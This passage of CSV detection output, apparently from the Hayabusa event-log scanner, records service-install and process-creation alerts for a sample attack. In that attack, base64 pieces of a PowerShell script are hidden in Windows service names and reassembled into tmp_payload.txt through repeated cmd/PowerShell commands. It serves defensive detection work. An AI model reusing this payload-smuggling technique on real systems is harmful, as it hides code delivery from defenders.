IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:34:27.978 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:27.993 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:35.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:35.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:38.274 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:38.290 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 